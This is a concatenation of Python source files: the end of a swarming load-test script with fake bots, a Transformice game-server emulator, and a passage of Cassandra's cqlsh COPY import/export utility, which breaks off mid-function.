('cpu', ['arm36']),
('hostname', socket.getfqdn()),
('os', OS_NAME),
])
group = optparse.OptionGroup(parser, 'Load generated')
group.add_option(
'--slaves', type='int', default=300, metavar='N',
help='Number of swarm bot slaves, default: %default')
group.add_option(
'-c', '--consume', type='float', default=60., metavar='N',
help='Duration (s) for consuming a request, default: %default')
parser.add_option_group(group)
group = optparse.OptionGroup(parser, 'Display options')
group.add_option(
'--columns', type='int', default=graph.get_console_width(), metavar='N',
help='For histogram display, default:%default')
group.add_option(
'--buckets', type='int', default=20, metavar='N',
help='Number of buckets for histogram display, default:%default')
parser.add_option_group(group)
parser.add_option(
'--dump', metavar='FOO.JSON', help='Dumps to json file')
parser.add_option(
'-v', '--verbose', action='store_true', help='Enables logging')
options, args = parser.parse_args()
logging.basicConfig(level=logging.INFO if options.verbose else logging.FATAL)
if args:
parser.error('Unsupported args: %s' % args)
options.swarming = options.swarming.rstrip('/')
if not options.swarming:
parser.error('--swarming is required.')
if options.consume <= 0:
parser.error('Needs --consume > 0. 0.01 is a valid value.')
swarming.process_filter_options(parser, options)
print(
'Running %d slaves, each task lasting %.1fs' % (
options.slaves, options.consume))
print('Ctrl-C to exit.')
print('[processing/processed/bots]')
columns = [('processing', 0), ('processed', 0), ('bots', 0)]
progress = threading_utils.Progress(columns)
events = Queue.Queue()
start = time.time()
kill_event = threading.Event()
swarm_bot_version_hash = calculate_version(options.swarming + '/bot_code')
hostname = get_hostname()
if options.suffix:
hostname += '-' + options.suffix
slaves = [
FakeSwarmBot(
options.swarming, options.dimensions, swarm_bot_version_hash, hostname, i,
progress, options.consume, events, kill_event)
for i in range(options.slaves)
]
try:
# Wait for all the slaves to come alive.
while not all(s.is_alive() for s in slaves):
time.sleep(0.01)
progress.update_item('Ready to run')
while slaves:
progress.print_update()
time.sleep(0.01)
# The slaves could be told to die.
slaves = [s for s in slaves if s.is_alive()]
except KeyboardInterrupt:
kill_event.set()
progress.update_item('Waiting for slaves to quit.', raw=True)
progress.update_item('')
while slaves:
progress.print_update()
slaves = [s for s in slaves if s.is_alive()]
# At this point, progress is not used anymore.
print('')
print('Ran for %.1fs.' % (time.time() - start))
print('')
results = list(events.queue)
print_results(results, options.columns, options.buckets)
if options.dump:
with open(options.dump, 'w') as f:
json.dump(results, f, separators=(',',':'))
return 0
if __name__ == '__main__':
sys.exit(main())
|
transformice.py
|
import threading
import time
from utils import logging
from server.tcp.TCPSocket import *
from server.json.JSONServer import *
from server.managers.TCPClientManager import *
from server.managers.JSONManager import *
__author__ = "b3ckerdev"
__license__ = "MIT License"
class Transformice:
__sockets__ = {}
@staticmethod
def run():
logging.info("Transformice emulator (v1.{0} version by {1})".format(
Transformice.version(),
__author__
)
)
running_ports = []
for port_number in [11801, 12801, 13801, 14801]:
Transformice.__sockets__[port_number] = TCPSocket("0.0.0.0", port_number)
Transformice.__sockets__[port_number].bind()
Transformice.__sockets__[port_number].listen(500000)
running_ports.append(port_number)
logging.debug("The following ports was opened for the server: {}".format(
running_ports
)
)
for sock in Transformice.__sockets__.values():
sock.start()
logging.info("All sockets were opened on dedicated threads.")
json_server = JSONServer("0.0.0.0", 8010)
json_server.bind()
json_server.listen(500000)
json_server.start()
thread = threading.Thread(target=TCPClientManager.check_all_clients_has_connected, args=())
thread.start()
thread = threading.Thread(target=JSONManager.check_all_clients_has_connected, args=())
thread.start()
print("\n")
@staticmethod
def version():
return 584
@staticmethod
def key():
return "dlIsYVC"
@staticmethod
def time():
return time.time()
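# Illustrative sketch (not part of the emulator): bringing up a single game
# socket the same way Transformice.run() does for every port; the port number
# below is one of the defaults used above.
def example_open_single_port(port=11801):
    sock = TCPSocket("0.0.0.0", port)
    sock.bind()
    sock.listen(500000)
    sock.start()
    return sock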
if __name__ == "__main__":
Transformice.run()
|
copyutil.py
|
# cython: profile=True
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import ConfigParser
import csv
import datetime
import json
import glob
import multiprocessing as mp
import os
import platform
import random
import re
import struct
import sys
import threading
import time
import traceback
from bisect import bisect_right
from calendar import timegm
from collections import defaultdict, namedtuple
from decimal import Decimal
from Queue import Queue
from random import randint
from StringIO import StringIO
from select import select
from uuid import UUID
from util import profile_on, profile_off
from cassandra.cluster import Cluster, DefaultConnection
from cassandra.cqltypes import ReversedType, UserType
from cassandra.metadata import protect_name, protect_names, protect_value
from cassandra.policies import RetryPolicy, WhiteListRoundRobinPolicy, DCAwareRoundRobinPolicy, FallthroughRetryPolicy
from cassandra.query import BatchStatement, BatchType, SimpleStatement, tuple_factory
from cassandra.util import Date, Time
from cql3handling import CqlRuleSet
from displaying import NO_COLOR_MAP
from formatting import format_value_default, CqlType, DateTimeFormat, EMPTY, get_formatter
from sslhandling import ssl_settings
PROFILE_ON = False
STRACE_ON = False
DEBUG = False # This may be set to True when initializing the task
IS_LINUX = platform.system() == 'Linux'
IS_WINDOWS = platform.system() == 'Windows'
CopyOptions = namedtuple('CopyOptions', 'copy dialect unrecognized')
def safe_normpath(fname):
"""
:return: the normalized path, but only if there is a filename; we don't want to convert
an empty string (which means no file name) to a dot. Also expands any user variables such as ~ to the full path.
"""
return os.path.normpath(os.path.expanduser(fname)) if fname else fname
def printdebugmsg(msg):
if DEBUG:
printmsg(msg)
def printmsg(msg, eol='\n', encoding='utf8'):
sys.stdout.write(msg.encode(encoding))
sys.stdout.write(eol)
sys.stdout.flush()
class OneWayPipe(object):
"""
A one way pipe protected by two process level locks, one for reading and one for writing.
"""
def __init__(self):
self.reader, self.writer = mp.Pipe(duplex=False)
self.rlock = mp.Lock()
self.wlock = mp.Lock()
def send(self, obj):
with self.wlock:
self.writer.send(obj)
def recv(self):
with self.rlock:
return self.reader.recv()
def close(self):
self.reader.close()
self.writer.close()
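# Illustrative sketch (not part of cqlsh): OneWayPipe lets one sender and one
# receiver exchange objects across processes, with each end guarded by its own
# lock. The worker function and message below are hypothetical.
def _example_pipe_child(pipe):
    pipe.send('hello from child')

def example_one_way_pipe():
    pipe = OneWayPipe()
    child = mp.Process(target=_example_pipe_child, args=(pipe,))
    child.start()
    msg = pipe.recv()  # blocks until the child has sent
    child.join()
    return msg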
class ReceivingChannel(object):
"""
A one way channel that wraps a pipe to receive messages.
"""
def __init__(self, pipe):
self.pipe = pipe
def recv(self):
return self.pipe.recv()
def close(self):
self.pipe.close()
class SendingChannel(object):
"""
A one way channel that wraps a pipe and provides a feeding thread to send messages asynchronously.
"""
def __init__(self, pipe):
self.pipe = pipe
self.pending_messages = Queue()
def feed():
while True:
try:
msg = self.pending_messages.get()
self.pipe.send(msg)
except Exception, e:
printmsg('%s: %s' % (e.__class__.__name__, e.message))
feeding_thread = threading.Thread(target=feed)
feeding_thread.setDaemon(True)
feeding_thread.start()
def send(self, obj):
self.pending_messages.put(obj)
def num_pending(self):
return self.pending_messages.qsize() if self.pending_messages else 0
def close(self):
self.pipe.close()
class SendingChannels(object):
"""
A group of one way channels for sending messages.
"""
def __init__(self, num_channels):
self.pipes = [OneWayPipe() for _ in xrange(num_channels)]
self.channels = [SendingChannel(p) for p in self.pipes]
self.num_channels = num_channels
def close(self):
for ch in self.channels:
try:
ch.close()
except:
pass
class ReceivingChannels(object):
"""
A group of one way channels for receiving messages.
"""
def __init__(self, num_channels):
self.pipes = [OneWayPipe() for _ in xrange(num_channels)]
self.channels = [ReceivingChannel(p) for p in self.pipes]
self._readers = [p.reader for p in self.pipes]
self._rlocks = [p.rlock for p in self.pipes]
self._rlocks_by_readers = dict([(p.reader, p.rlock) for p in self.pipes])
self.num_channels = num_channels
self.recv = self.recv_select if IS_LINUX else self.recv_polling
def recv_select(self, timeout):
"""
Implementation of the recv method for Linux, where select is available. Receive an object from
all pipes that are ready for reading without blocking.
"""
readable, _, _ = select(self._readers, [], [], timeout)
for r in readable:
with self._rlocks_by_readers[r]:
try:
yield r.recv()
except EOFError:
continue
def recv_polling(self, timeout):
"""
Implementation of the recv method for platforms where select() is not available for pipes.
We poll on all of the readers with a very small timeout. We stop when the specified timeout
has elapsed, but we may exceed it since we check all processes during each sweep.
"""
start = time.time()
while True:
for i, r in enumerate(self._readers):
with self._rlocks[i]:
if r.poll(0.000000001):
try:
yield r.recv()
except EOFError:
continue
if time.time() - start > timeout:
break
def close(self):
for ch in self.channels:
try:
ch.close()
except:
pass
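# Illustrative sketch (not part of cqlsh): how the two channel groups above get
# paired up. The parent keeps ReceivingChannels for results and SendingChannels
# for work; each child is handed the matching pipes swapped, so the child's
# 'inpipe' is the parent's outgoing pipe and vice versa. The worker count and
# timeout below are arbitrary.
def example_channel_groups(num_workers=2):
    inmsg = ReceivingChannels(num_workers)   # children -> parent
    outmsg = SendingChannels(num_workers)    # parent -> children
    child_params = [{'inpipe': outmsg.pipes[i], 'outpipe': inmsg.pipes[i]}
                    for i in range(num_workers)]
    drained = list(inmsg.recv(timeout=0.1))  # nothing sent yet, so this is empty
    return child_params, drained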
class CopyTask(object):
"""
A base class for ImportTask and ExportTask
"""
def __init__(self, shell, ks, table, columns, fname, opts, protocol_version, config_file, direction):
self.shell = shell
self.ks = ks
self.table = table
self.table_meta = self.shell.get_table_meta(self.ks, self.table)
self.host = shell.conn.get_control_connection_host()
self.fname = safe_normpath(fname)
self.protocol_version = protocol_version
self.config_file = config_file
# if cqlsh is invoked with --debug then set the global debug flag to True
if shell.debug:
global DEBUG
DEBUG = True
# do not display messages when exporting to STDOUT unless --debug is set
self.printmsg = printmsg if self.fname is not None or direction == 'from' or DEBUG \
else lambda _, eol='\n', encoding='utf8': None
self.options = self.parse_options(opts, direction)
self.num_processes = self.options.copy['numprocesses']
self.encoding = self.options.copy['encoding']
self.printmsg('Using %d child processes' % (self.num_processes,))
if direction == 'from':
self.num_processes += 1 # add the feeder process
self.processes = []
self.inmsg = ReceivingChannels(self.num_processes)
self.outmsg = SendingChannels(self.num_processes)
self.columns = CopyTask.get_columns(shell, ks, table, columns)
self.time_start = time.time()
def maybe_read_config_file(self, opts, direction):
"""
Read optional sections from a configuration file that was specified in the command options or from the default
cqlshrc configuration file if none was specified.
"""
config_file = opts.pop('configfile', '')
if not config_file:
config_file = self.config_file
if not os.path.isfile(config_file):
return opts
configs = ConfigParser.RawConfigParser()
configs.readfp(open(config_file))
ret = dict()
config_sections = list(['copy', 'copy-%s' % (direction,),
'copy:%s.%s' % (self.ks, self.table),
'copy-%s:%s.%s' % (direction, self.ks, self.table)])
for section in config_sections:
if configs.has_section(section):
options = dict(configs.items(section))
self.printmsg("Reading options from %s:[%s]: %s" % (config_file, section, options))
ret.update(options)
# Update this last so the command line options take precedence over the configuration file options
if opts:
self.printmsg("Reading options from the command line: %s" % (opts,))
ret.update(opts)
if self.shell.debug: # this is important for testing, do not remove
self.printmsg("Using options: '%s'" % (ret,))
return ret
@staticmethod
def clean_options(opts):
"""
Convert all option values to valid string literals unless they are path names
"""
return dict([(k, v.decode('string_escape') if k not in ['errfile', 'ratefile'] else v)
for k, v in opts.iteritems()])
def parse_options(self, opts, direction):
"""
Parse options for import (COPY FROM) and export (COPY TO) operations.
Extract the csv and dialect options from opts.
:return: a CopyOptions namedtuple holding 3 dictionaries: the copy options, the dialect options, and any unrecognized options.
"""
shell = self.shell
opts = self.clean_options(self.maybe_read_config_file(opts, direction))
dialect_options = dict()
dialect_options['quotechar'] = opts.pop('quote', '"')
dialect_options['escapechar'] = opts.pop('escape', '\\')
dialect_options['delimiter'] = opts.pop('delimiter', ',')
if dialect_options['quotechar'] == dialect_options['escapechar']:
dialect_options['doublequote'] = True
del dialect_options['escapechar']
else:
dialect_options['doublequote'] = False
copy_options = dict()
copy_options['nullval'] = opts.pop('null', '')
copy_options['header'] = bool(opts.pop('header', '').lower() == 'true')
copy_options['encoding'] = opts.pop('encoding', 'utf8')
copy_options['maxrequests'] = int(opts.pop('maxrequests', 6))
copy_options['pagesize'] = int(opts.pop('pagesize', 1000))
# by default the page timeout is 10 seconds per 1000 entries
# in the page size or 10 seconds if pagesize is smaller
copy_options['pagetimeout'] = int(opts.pop('pagetimeout', max(10, 10 * (copy_options['pagesize'] / 1000))))
copy_options['maxattempts'] = int(opts.pop('maxattempts', 5))
copy_options['dtformats'] = DateTimeFormat(opts.pop('datetimeformat', shell.display_timestamp_format),
shell.display_date_format, shell.display_nanotime_format,
milliseconds_only=True)
copy_options['floatprecision'] = int(opts.pop('floatprecision', '5'))
copy_options['doubleprecision'] = int(opts.pop('doubleprecision', '12'))
copy_options['chunksize'] = int(opts.pop('chunksize', 5000))
copy_options['ingestrate'] = int(opts.pop('ingestrate', 100000))
copy_options['maxbatchsize'] = int(opts.pop('maxbatchsize', 20))
copy_options['minbatchsize'] = int(opts.pop('minbatchsize', 10))
copy_options['reportfrequency'] = float(opts.pop('reportfrequency', 0.25))
copy_options['consistencylevel'] = shell.consistency_level
copy_options['decimalsep'] = opts.pop('decimalsep', '.')
copy_options['thousandssep'] = opts.pop('thousandssep', '')
copy_options['boolstyle'] = [s.strip() for s in opts.pop('boolstyle', 'True, False').split(',')]
copy_options['numprocesses'] = int(opts.pop('numprocesses', self.get_num_processes(16)))
copy_options['begintoken'] = opts.pop('begintoken', '')
copy_options['endtoken'] = opts.pop('endtoken', '')
copy_options['maxrows'] = int(opts.pop('maxrows', '-1'))
copy_options['skiprows'] = int(opts.pop('skiprows', '0'))
copy_options['skipcols'] = opts.pop('skipcols', '')
copy_options['maxparseerrors'] = int(opts.pop('maxparseerrors', '-1'))
copy_options['maxinserterrors'] = int(opts.pop('maxinserterrors', '1000'))
copy_options['errfile'] = safe_normpath(opts.pop('errfile', 'import_%s_%s.err' % (self.ks, self.table,)))
copy_options['ratefile'] = safe_normpath(opts.pop('ratefile', ''))
copy_options['maxoutputsize'] = int(opts.pop('maxoutputsize', '-1'))
copy_options['preparedstatements'] = bool(opts.pop('preparedstatements', 'true').lower() == 'true')
copy_options['ttl'] = int(opts.pop('ttl', -1))
# Hidden properties, they do not appear in the documentation but can be set in config files
# or on the cmd line but w/o completion
copy_options['maxinflightmessages'] = int(opts.pop('maxinflightmessages', '512'))
copy_options['maxbackoffattempts'] = int(opts.pop('maxbackoffattempts', '12'))
copy_options['maxpendingchunks'] = int(opts.pop('maxpendingchunks', '24'))
self.check_options(copy_options)
return CopyOptions(copy=copy_options, dialect=dialect_options, unrecognized=opts)
@staticmethod
def check_options(copy_options):
"""
Check any options that require a sanity check beyond a simple type conversion and if required
raise a value error:
- boolean styles must be exactly 2, they must be different and they cannot be empty
"""
bool_styles = copy_options['boolstyle']
if len(bool_styles) != 2 or bool_styles[0] == bool_styles[1] or not bool_styles[0] or not bool_styles[1]:
raise ValueError("Invalid boolean styles %s" % copy_options['boolstyle'])
@staticmethod
def get_num_processes(cap):
"""
Pick a reasonable number of child processes. We need to leave at
least one core for the parent or feeder process.
"""
return max(1, min(cap, CopyTask.get_num_cores() - 1))
@staticmethod
def get_num_cores():
"""
Return the number of cores if available. If the test environment variable
is set, then return the number carried by this variable. This is to test single-core
machines more easily.
"""
try:
num_cores_for_testing = os.environ.get('CQLSH_COPY_TEST_NUM_CORES', '')
ret = int(num_cores_for_testing) if num_cores_for_testing else mp.cpu_count()
printdebugmsg("Detected %d core(s)" % (ret,))
return ret
except NotImplementedError:
printdebugmsg("Failed to detect number of cores, returning 1")
return 1
@staticmethod
def describe_interval(seconds):
desc = []
for length, unit in ((86400, 'day'), (3600, 'hour'), (60, 'minute')):
num = int(seconds) / length
if num > 0:
desc.append('%d %s' % (num, unit))
if num > 1:
desc[-1] += 's'
seconds %= length
words = '%.03f seconds' % seconds
if len(desc) > 1:
words = ', '.join(desc) + ', and ' + words
elif len(desc) == 1:
words = desc[0] + ' and ' + words
return words
@staticmethod
def get_columns(shell, ks, table, columns):
"""
Return all columns if none were specified or only the columns specified.
Possible enhancement: introduce a regex like syntax (^) to allow users
to specify all columns except a few.
"""
return shell.get_column_names(ks, table) if not columns else columns
def close(self):
self.stop_processes()
self.inmsg.close()
self.outmsg.close()
def num_live_processes(self):
return sum(1 for p in self.processes if p.is_alive())
@staticmethod
def get_pid():
return os.getpid() if hasattr(os, 'getpid') else None
@staticmethod
def trace_process(pid):
if pid and STRACE_ON:
os.system("strace -vvvv -c -o strace.{pid}.out -e trace=all -p {pid}&".format(pid=pid))
def start_processes(self):
for i, process in enumerate(self.processes):
process.start()
self.trace_process(process.pid)
self.trace_process(self.get_pid())
def stop_processes(self):
for process in self.processes:
process.terminate()
def make_params(self):
"""
Return a dictionary of parameters to be used by the worker processes.
On Windows this dictionary must be pickle-able, therefore we do not pass the
parent connection since it may not be pickle-able. Also, on Windows child
processes are spawned and not forked, and therefore we don't need to shutdown
the parent connection anyway, see CASSANDRA-11749 for more details.
"""
shell = self.shell
return dict(ks=self.ks,
table=self.table,
local_dc=self.host.datacenter,
columns=self.columns,
options=self.options,
connect_timeout=shell.conn.connect_timeout,
hostname=self.host.address,
port=shell.port,
ssl=shell.ssl,
auth_provider=shell.auth_provider,
parent_cluster=shell.conn if not IS_WINDOWS else None,
cql_version=shell.conn.cql_version,
config_file=self.config_file,
protocol_version=self.protocol_version,
debug=shell.debug
)
def validate_columns(self):
shell = self.shell
if not self.columns:
shell.printerr("No column specified")
return False
for c in self.columns:
if c not in self.table_meta.columns:
shell.printerr('Invalid column name %s' % (c,))
return False
return True
def update_params(self, params, i):
"""
Add the communication pipes to the parameters to be passed to the worker process:
'inpipe' carries messages flowing from parent to child, so it is the outgoing pipe from the
parent's point of view; 'outpipe' carries messages flowing from child to parent, so it is the
incoming pipe from the parent's point of view. Hence the two are swapped below.
"""
params['inpipe'] = self.outmsg.pipes[i]
params['outpipe'] = self.inmsg.pipes[i]
return params
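# Illustrative sketch (not part of cqlsh): CopyTask.describe_interval() turns an
# elapsed number of seconds into English, e.g. 3725.5 seconds becomes
# '1 hour, 2 minutes, and 5.500 seconds'. The value below is arbitrary.
def example_describe_elapsed(seconds=3725.5):
    return CopyTask.describe_interval(seconds)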
class ExportWriter(object):
"""
A class that writes to one or more csv files, or STDOUT
"""
def __init__(self, fname, shell, columns, options):
self.fname = fname
self.shell = shell
self.columns = columns
self.options = options
self.header = options.copy['header']
self.max_output_size = long(options.copy['maxoutputsize'])
self.current_dest = None
self.num_files = 0
if self.max_output_size > 0:
if fname is not None:
self.write = self._write_with_split
self.num_written = 0
else:
shell.printerr("WARNING: maxoutputsize {} ignored when writing to STDOUT".format(self.max_output_size))
self.write = self._write_without_split
else:
self.write = self._write_without_split
def open(self):
self.current_dest = self._get_dest(self.fname)
if self.current_dest is None:
return False
if self.header:
writer = csv.writer(self.current_dest.output, **self.options.dialect)
writer.writerow(self.columns)
return True
def close(self):
self._close_current_dest()
def _next_dest(self):
self._close_current_dest()
self.current_dest = self._get_dest(self.fname + '.%d' % (self.num_files,))
def _get_dest(self, source_name):
"""
Open the output file if any or else use stdout. Return a namedtuple
containing the output and a boolean indicating if the output should be closed.
"""
CsvDest = namedtuple('CsvDest', 'output close')
if self.fname is None:
return CsvDest(output=sys.stdout, close=False)
else:
try:
ret = CsvDest(output=open(source_name, 'wb'), close=True)
self.num_files += 1
return ret
except IOError, e:
self.shell.printerr("Can't open %r for writing: %s" % (source_name, e))
return None
def _close_current_dest(self):
if self.current_dest and self.current_dest.close:
self.current_dest.output.close()
self.current_dest = None
def _write_without_split(self, data, _):
"""
Write the data to the current destination output.
"""
self.current_dest.output.write(data)
def _write_with_split(self, data, num):
"""
Write the data to the current destination output if we still
haven't reached the maximum number of rows. Otherwise split
the rows between the current destination and the next.
"""
if (self.num_written + num) > self.max_output_size:
num_remaining = self.max_output_size - self.num_written
last_switch = 0
for i, row in enumerate(filter(None, data.split(os.linesep))):
if i == num_remaining:
self._next_dest()
last_switch = i
num_remaining += self.max_output_size
self.current_dest.output.write(row + '\n')
self.num_written = num - last_switch
else:
self.num_written += num
self.current_dest.output.write(data)
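# Illustrative sketch (not part of cqlsh): with a positive maxoutputsize and a
# real output file name, ExportWriter._write_with_split() rolls over to a new
# destination (fname, fname.1, fname.2, ...) once maxoutputsize rows have been
# written. The figures below are hypothetical.
def example_rows_per_output_file(total_rows=2500, max_output_size=1000):
    full, remainder = divmod(total_rows, max_output_size)
    # 2500 rows with a 1000-row cap -> files of 1000, 1000 and 500 rows.
    return [max_output_size] * full + ([remainder] if remainder else [])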
class ExportTask(CopyTask):
"""
A class that exports data to .csv by instantiating one or more processes that work in parallel (ExportProcess).
"""
def __init__(self, shell, ks, table, columns, fname, opts, protocol_version, config_file):
CopyTask.__init__(self, shell, ks, table, columns, fname, opts, protocol_version, config_file, 'to')
options = self.options
self.begin_token = long(options.copy['begintoken']) if options.copy['begintoken'] else None
self.end_token = long(options.copy['endtoken']) if options.copy['endtoken'] else None
self.writer = ExportWriter(fname, shell, columns, options)
def run(self):
"""
Initiates the export by starting the worker processes.
Then hand over control to export_records.
"""
shell = self.shell
if self.options.unrecognized:
shell.printerr('Unrecognized COPY TO options: %s' % ', '.join(self.options.unrecognized.keys()))
return
if not self.validate_columns():
return 0
ranges = self.get_ranges()
if not ranges:
return 0
if not self.writer.open():
return 0
columns = u"[" + u", ".join(self.columns) + u"]"
self.printmsg(u"\nStarting copy of %s.%s with columns %s." % (self.ks, self.table, columns), encoding=self.encoding)
params = self.make_params()
for i in xrange(self.num_processes):
self.processes.append(ExportProcess(self.update_params(params, i)))
self.start_processes()
try:
self.export_records(ranges)
finally:
self.close()
def close(self):
CopyTask.close(self)
self.writer.close()
def get_ranges(self):
"""
Return a dict keyed by token range (from, to], where each value records the hosts that
own that range (plus bookkeeping such as attempt and row counts). Each host is responsible
for all the tokens in the range (from, to].
The ring information comes from the driver metadata token map, which is built by
querying System.PEERS.
We only consider replicas that are in the local datacenter. If there are no local replicas
we use the cqlsh session host.
"""
shell = self.shell
hostname = self.host.address
local_dc = self.host.datacenter
ranges = dict()
min_token = self.get_min_token()
begin_token = self.begin_token
end_token = self.end_token
def make_range(prev, curr):
"""
Return the intersection of (prev, curr) and (begin_token, end_token),
return None if the intersection is empty
"""
ret = (prev, curr)
if begin_token:
if ret[1] < begin_token:
return None
elif ret[0] < begin_token:
ret = (begin_token, ret[1])
if end_token:
if ret[0] > end_token:
return None
elif ret[1] > end_token:
ret = (ret[0], end_token)
return ret
def make_range_data(replicas=None):
hosts = []
if replicas:
for r in replicas:
if r.is_up is not False and r.datacenter == local_dc:
hosts.append(r.address)
if not hosts:
hosts.append(hostname) # fallback to default host if no replicas in current dc
return {'hosts': tuple(hosts), 'attempts': 0, 'rows': 0, 'workerno': -1}
if begin_token and begin_token < min_token:
shell.printerr('Begin token %d must be bigger or equal to min token %d' % (begin_token, min_token))
return ranges
if begin_token and end_token and begin_token > end_token:
shell.printerr('Begin token %d must be smaller than end token %d' % (begin_token, end_token))
return ranges
if shell.conn.metadata.token_map is None or min_token is None:
ranges[(begin_token, end_token)] = make_range_data()
return ranges
ring = shell.get_ring(self.ks).items()
ring.sort()
if not ring:
# If the ring is empty we get the entire ring from the host we are currently connected to
ranges[(begin_token, end_token)] = make_range_data()
elif len(ring) == 1:
# If there is only one token we get the entire ring from the replicas for that token
ranges[(begin_token, end_token)] = make_range_data(ring[0][1])
else:
# else we loop on the ring
first_range_data = None
previous = None
for token, replicas in ring:
if not first_range_data:
first_range_data = make_range_data(replicas) # we use it at the end when wrapping around
if token.value == min_token:
continue # avoids looping entire ring
current_range = make_range(previous, token.value)
if not current_range:
continue
ranges[current_range] = make_range_data(replicas)
previous = token.value
# For the last ring interval we query the same replicas that hold the first token in the ring
if previous is not None and (not end_token or previous < end_token):
ranges[(previous, end_token)] = first_range_data
if not ranges:
shell.printerr('Found no ranges to query, check begin and end tokens: %s - %s' % (begin_token, end_token))
return ranges
def get_min_token(self):
"""
:return the minimum token, which depends on the partitioner.
For partitioners that do not support tokens we return None, in
this case we will not work in parallel; we'll just send all requests
to the cqlsh session host.
"""
partitioner = self.shell.conn.metadata.partitioner
if partitioner.endswith('RandomPartitioner'):
return -1
elif partitioner.endswith('Murmur3Partitioner'):
return -(2 ** 63) # Long.MIN_VALUE in Java
else:
return None
def send_work(self, ranges, tokens_to_send):
prev_worker_no = ranges[tokens_to_send[0]]['workerno']
i = prev_worker_no + 1 if -1 <= prev_worker_no < (self.num_processes - 1) else 0
for token_range in tokens_to_send:
ranges[token_range]['workerno'] = i
self.outmsg.channels[i].send((token_range, ranges[token_range]))
ranges[token_range]['attempts'] += 1
i = i + 1 if i < self.num_processes - 1 else 0
def export_records(self, ranges):
"""
Send records to child processes and monitor them by collecting their results
or any errors. We terminate when we have processed all the ranges or when one child
process has died (since in this case we will never get any ACK for the ranges
processed by it and at the moment we don't keep track of which ranges a
process is handling).
"""
shell = self.shell
processes = self.processes
meter = RateMeter(log_fcn=self.printmsg,
update_interval=self.options.copy['reportfrequency'],
log_file=self.options.copy['ratefile'])
total_requests = len(ranges)
max_attempts = self.options.copy['maxattempts']
self.send_work(ranges, ranges.keys())
num_processes = len(processes)
succeeded = 0
failed = 0
while (failed + succeeded) < total_requests and self.num_live_processes() == num_processes:
for token_range, result in self.inmsg.recv(timeout=0.1):
if token_range is None and result is None: # a request has finished
succeeded += 1
elif isinstance(result, Exception): # an error occurred
# This token_range failed; retry up to max_attempts if no rows were received yet.
# If rows were already received we'd risk duplicating data.
# Note that there is still a slight risk of duplicating data, even if we have
# an error with no rows received yet; it's just less likely. Avoiding retries on
# all timeouts, however, would risk not exporting some rows.
if ranges[token_range]['attempts'] < max_attempts and ranges[token_range]['rows'] == 0:
shell.printerr('Error for %s: %s (will try again later attempt %d of %d)'
% (token_range, result, ranges[token_range]['attempts'], max_attempts))
self.send_work(ranges, [token_range])
else:
shell.printerr('Error for %s: %s (permanently given up after %d rows and %d attempts)'
% (token_range, result, ranges[token_range]['rows'],
ranges[token_range]['attempts']))
failed += 1
else: # partial result received
data, num = result
self.writer.write(data, num)
meter.increment(n=num)
ranges[token_range]['rows'] += num
if self.num_live_processes() < len(processes):
for process in processes:
if not process.is_alive():
shell.printerr('Child process %d died with exit code %d' % (process.pid, process.exitcode))
if succeeded < total_requests:
shell.printerr('Exported %d ranges out of %d total ranges, some records might be missing'
% (succeeded, total_requests))
self.printmsg("\n%d rows exported to %d files in %s." %
(meter.get_total_records(),
self.writer.num_files,
self.describe_interval(time.time() - self.time_start)))
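# Illustrative sketch (not part of cqlsh): the partitioner-dependent minimum
# token that ExportTask.get_min_token() returns; any other partitioner yields
# None, and the export then falls back to querying the session host without
# token-range parallelism.
EXAMPLE_MIN_TOKENS = {
    'Murmur3Partitioner': -(2 ** 63),  # Long.MIN_VALUE in Java
    'RandomPartitioner': -1,
}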
class FilesReader(object):
"""
A wrapper around a csv reader to keep track of when we have
exhausted reading input files. We are passed a comma separated
list of paths, where each path is a valid glob expression.
We generate a source generator and we read each source one
by one.
"""
def __init__(self, fname, options):
self.chunk_size = options.copy['chunksize']
self.header = options.copy['header']
self.max_rows = options.copy['maxrows']
self.skip_rows = options.copy['skiprows']
self.fname = fname
self.sources = None # must be created later due to pickle problems on Windows
self.num_sources = 0
self.current_source = None
self.num_read = 0
def get_source(self, paths):
"""
Return a source generator that yields one open file object per matching path.
Each entry in the comma-separated list of paths may name a file directly or be
a glob expression.
"""
def make_source(fname):
try:
return open(fname, 'rb')
except IOError, e:
raise IOError("Can't open %r for reading: %s" % (fname, e))
for path in paths.split(','):
path = path.strip()
if os.path.isfile(path):
yield make_source(path)
else:
result = glob.glob(path)
if len(result) == 0:
raise IOError("Can't open %r for reading: no matching file found" % (path,))
for f in result:
yield (make_source(f))
def start(self):
self.sources = self.get_source(self.fname)
self.next_source()
@property
def exhausted(self):
return not self.current_source
def next_source(self):
"""
Close the current source, if any, and open the next one. Return true
if there is another source, false otherwise.
"""
self.close_current_source()
while self.current_source is None:
try:
self.current_source = self.sources.next()
if self.current_source:
self.num_sources += 1
except StopIteration:
return False
if self.header:
self.current_source.next()
return True
def close_current_source(self):
if not self.current_source:
return
self.current_source.close()
self.current_source = None
def close(self):
self.close_current_source()
def read_rows(self, max_rows):
if not self.current_source:
return []
rows = []
for i in xrange(min(max_rows, self.chunk_size)):
try:
row = self.current_source.next()
self.num_read += 1
if 0 <= self.max_rows < self.num_read:
self.next_source()
break
if self.num_read > self.skip_rows:
rows.append(row)
except StopIteration:
self.next_source()
break
return filter(None, rows)
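# Illustrative sketch (not part of cqlsh): driving FilesReader directly over a
# comma-separated list of glob patterns, as its docstring describes. The paths
# are hypothetical and 'options' is a CopyOptions value such as the one built by
# CopyTask.parse_options().
def example_read_first_chunk(options):
    reader = FilesReader('data1.csv, exports/*.csv', options)
    reader.start()
    rows = reader.read_rows(100)  # at most min(100, chunksize) raw csv lines
    reader.close()
    return rows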
class PipeReader(object):
"""
A class for reading rows received on a pipe; this is used for reading input from STDIN.
"""
def __init__(self, inpipe, options):
self.inpipe = inpipe
self.chunk_size = options.copy['chunksize']
self.header = options.copy['header']
self.max_rows = options.copy['maxrows']
self.skip_rows = options.copy['skiprows']
self.num_read = 0
self.exhausted = False
self.num_sources = 1
def start(self):
pass
def read_rows(self, max_rows):
rows = []
for i in xrange(min(max_rows, self.chunk_size)):
row = self.inpipe.recv()
if row is None:
self.exhausted = True
break
self.num_read += 1
if 0 <= self.max_rows < self.num_read:
self.exhausted = True
break # max rows exceeded
